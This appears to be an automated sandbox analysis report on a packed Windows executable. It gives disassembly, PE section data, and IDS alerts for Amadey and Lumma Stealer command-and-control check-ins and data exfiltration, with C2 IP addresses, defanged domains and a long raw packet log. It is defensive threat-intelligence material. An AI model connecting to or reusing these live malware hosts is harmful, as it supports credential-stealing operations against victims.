                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                          Instruction
                                                                                                                                          jmp 00007F62550F675Ah
                                                                                                                                          cvttps2pi mm6, qword ptr [edx]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add cl, ch
                                                                                                                                          add byte ptr [eax], ah
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                          add byte ptr [eax], 00000000h
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          or ecx, dword ptr [edx]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          pushad
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [ebx], cl
                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                          add byte ptr [esi], al
                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                          add byte ptr [edx+ecx], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add dword ptr [edx], ecx
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add cl, byte ptr [edx]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x388.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x323ee00x10fuapnweu
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x323e900x18fuapnweu
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          0x10000x680000x68000ef7faa96a6bd68138326ac50c0d5a94bFalse0.5600609412560096data7.091531284941182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0x690000x3880x400514f5782f497fa171df6168314823de0False0.453125data5.340697973950139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          fuapnweu0x6b0000x2b90000x2b9000c19dd2e5c9427fac23ff7f1ccb3437edunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          sdiwzxtv0x3240000x10000x600d2190141d2e6558bd754b682dfc835e9False0.5735677083333334data4.957286544382096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .taggant0x3250000x30000x2200a22fd1bd21ca9b3c60fe47ce0b20b47fFalse0.04779411764705882DOS executable (COM)0.7533920781300826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_MANIFEST0x690700x198ASCII text, with CRLF line terminators0.5808823529411765
                                                                                                                                          RT_MANIFEST0x692080x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                          DLLImport
                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States
                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2024-12-08T18:06:05.522349+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449753185.215.113.4380TCP
                                                                                                                                          2024-12-08T18:06:09.970923+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976531.41.244.1180TCP
                                                                                                                                          2024-12-08T18:06:15.190263+01002057921ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)1192.168.2.4514541.1.1.153UDP
                                                                                                                                          2024-12-08T18:06:15.649889+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449759TCP
                                                                                                                                          2024-12-08T18:06:16.984431+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449782172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:16.984431+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449782172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:17.241805+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449781185.215.113.4380TCP
                                                                                                                                          2024-12-08T18:06:17.744416+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449782172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:17.744416+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449782172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:19.035021+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449788172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:19.035021+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449788172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:19.936454+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449788172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:19.936454+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449788172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:21.479655+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449795172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:21.479655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449795172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:23.869780+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449802172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:23.869780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449802172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:26.419153+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449810172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:26.419153+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449810172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:29.112582+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449819172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:29.112582+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449819172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:29.860901+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449819172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:31.476507+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449826172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:31.476507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449826172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:35.143703+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449834172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:35.143703+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449834172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:36.233362+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449834172.67.165.166443TCP
                                                                                                                                          2024-12-08T18:06:37.916093+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449845104.21.9.168443TCP
                                                                                                                                          2024-12-08T18:06:47.665769+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449868104.21.9.168443TCP
                                                                                                                                          2024-12-08T18:06:50.636415+01002057935ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)1192.168.2.4590901.1.1.153UDP
                                                                                                                                          2024-12-08T18:06:50.636415+01002057969ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)1192.168.2.4590901.1.1.153UDP
                                                                                                                                          2024-12-08T18:06:51.028330+01002057945ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.4587991.1.1.153UDP
                                                                                                                                          2024-12-08T18:06:51.028330+01002057983ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.4587991.1.1.153UDP
                                                                                                                                          2024-12-08T18:06:52.656290+01002057946ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI)1192.168.2.449886104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:52.656290+01002057984ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI)1192.168.2.449886104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:52.656290+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449886104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:53.390663+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449886104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:53.390663+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449886104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:54.647885+01002057946ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI)1192.168.2.449893104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:54.647885+01002057984ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI)1192.168.2.449893104.21.81.153443TCP
                                                                                                                                          2024-12-08T18:06:54.647885+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449893104.21.81.153443TCP
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 8, 2024 18:06:04.058327913 CET4975380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:04.177674055 CET8049753185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:04.177762032 CET4975380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:04.177908897 CET4975380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:04.298274040 CET8049753185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:05.522176027 CET8049753185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:05.522349119 CET4975380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:07.032536030 CET4975380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:07.039515972 CET4975980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:07.152307987 CET8049753185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:07.152371883 CET4975380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:07.158788919 CET8049759185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:07.158870935 CET4975980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:07.159018040 CET4975980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:07.278219938 CET8049759185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:08.502834082 CET8049759185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:08.502897978 CET4975980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:08.506513119 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:08.626455069 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:08.626569986 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:08.626698971 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:08.745876074 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.970753908 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.970922947 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.970927000 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.970937014 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.970947981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.970957994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.970971107 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.970993042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.971097946 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.971144915 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.971164942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.971205950 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.971369028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.971380949 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.971391916 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:09.971415997 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.971434116 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.094274998 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.094296932 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.094327927 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.094352961 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.097642899 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.097692966 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.097805977 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.097845078 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.162591934 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.162657022 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.162689924 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.162736893 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.166743994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.166790009 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.166862965 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.166913033 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.175079107 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.175153017 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.175267935 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.175318003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.183840036 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.183896065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.184175968 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.184212923 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.191761017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.191827059 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.191906929 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.191952944 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.200108051 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.200246096 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.200256109 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.200272083 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.208477974 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.208548069 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.208604097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.208647013 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.216852903 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.216934919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.217180967 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.217231035 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.225227118 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.225284100 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.225372076 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.225414991 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.233541012 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.233586073 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.233614922 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.233654022 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.241333008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.241394043 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.241431952 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.241476059 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.248774052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.248816967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.248847008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.248886108 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.354691982 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.354746103 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.354805946 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.354845047 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.357414961 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.357456923 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.357542992 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.357584000 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.361315966 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.361366034 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.361391068 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.361433029 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.365700960 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.365750074 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.365803003 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.365845919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.370096922 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.370143890 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.370177984 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.370218039 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.374631882 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.374679089 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.374731064 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.374774933 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.379089117 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.379134893 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.379154921 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.379199982 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.383358955 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.383420944 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.383547068 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.383590937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.387754917 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.387801886 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.387890100 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.387933969 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.392178059 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.392229080 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.392286062 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.392337084 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.396624088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.396694899 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.396755934 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.396797895 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.401329994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.401376009 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.401453972 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.401494026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.405451059 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.405495882 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.405529976 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.405596018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.409908056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.409971952 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.409996986 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.410042048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.414294004 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.414338112 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.414364100 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.414411068 CET4976580192.168.2.431.41.244.11
